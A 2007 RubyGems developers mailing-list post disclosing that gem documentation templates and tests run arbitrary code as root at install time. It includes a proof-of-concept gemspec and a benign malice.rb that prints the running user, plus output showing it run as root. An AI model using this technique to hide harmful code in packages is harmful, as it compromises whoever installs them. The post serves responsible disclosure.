[Rubygems-developers] Need to release 0.9.1 due to security exploit

Paul Duncan pabs at pablotron.org
Sat Jan 13 01:58:15 EST 2007

* Eric Hodel (drbrain at segment7.net) wrote:
> I've checked in fixes for an installation exploit found by Gavin  
> Sinclair.  Here's a draft email describing the exploit and how to fix  
> RubyGems.  I only supplied patches for the past two versions of  
> RubyGems, since tattle says that's what everybody uses.
> Subject: RubyGems 0.9.0 and earlier installation exploit
> Problem Description:
> RubyGems does not check installation paths for gems before writing  
> files.

The potential security problems with RubyGems are actually much worse
than that.  Documentation and tests are executed as the user doing the
install (which, as you said, is usually root).  That means I can embed
arbitrary Ruby code in either the documentation template and it will
usually be run as root.  For example:

  spec = Gem::Specification.new do |s|
    # usual gem stuff here
    # ...

    s.rdoc_options = %w{--template ./malice.rb}

  # contents of malice.rb:

  $stderr.puts "hello, i'm running as #{ENV['USER']}"
  exit 0

All of that produces the following:

  pabs at halcyon:~/proj/snippets/ruby/malice> gem build ./malice.gemspec 
    Successfully built RubyGem
    Name: Malicious-Gem
    Version: 0.1.0
    File: Malicious-Gem-0.1.0.gem
  pabs at halcyon:~/proj/snippets/ruby/malice> sudo gem install ./Malicious-Gem-0.1.0.gem 
  Successfully installed Malicious-Gem, version 0.1.0
  Installing ri documentation for Malicious-Gem-0.1.0...
  Installing RDoc documentation for Malicious-Gem-0.1.0...
  hello, i'm running as root

Obviously the same thing can be done with unit tests.  While neither of
these are a bug with RubyGems per-se, they're both convenient places to
hide sneak away code that will be run as root on a lot of machines at
install time.

Paul Duncan <pabs at pablotron.org>        OpenPGP Key ID: 0x82C29562
http://www.pablotron.org/               http://www.paulduncan.org/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://rubyforge.org/pipermail/rubygems-developers/attachments/20070113/6f903488/attachment.bin 

More information about the Rubygems-developers mailing list